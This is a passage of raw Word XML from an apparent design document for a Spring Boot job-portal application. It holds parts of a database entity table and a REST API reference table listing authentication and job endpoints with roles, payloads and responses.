          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Scheduled evaluation round holding round name, scheduled time, meeting URL, feedback.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Offer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>offers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: application_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToOne -&gt; Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Formal compensation offer holding annual salary, joining date, terms, and acceptance status.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SavedJob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>saved_jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: user_id, job_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne -&gt; User, ManyToOne -&gt; Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate bookmark holding user and vacancy references with savedAt timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AuditLog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>audit_logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None (Decoupled append-only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immutable governance record tracking action, performedBy, client IP, and timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>14. Complete REST API Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Spring Boot backend exposes a comprehensive RESTful API surface. All protected routes require a valid JWT Bearer token:</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1152"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Verb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>API Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload / Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Success Response Code &amp; Body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/auth/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ username, email, password, role }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created: { token, user, message }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{ username, password }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: { token, type: 'Bearer', user }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>?search=java&amp;location=Remote&amp;type=FULL_TIME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: List&lt;JobDto&gt; with company and skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: JobDetailDto with full description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/jobs/{id}/match</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
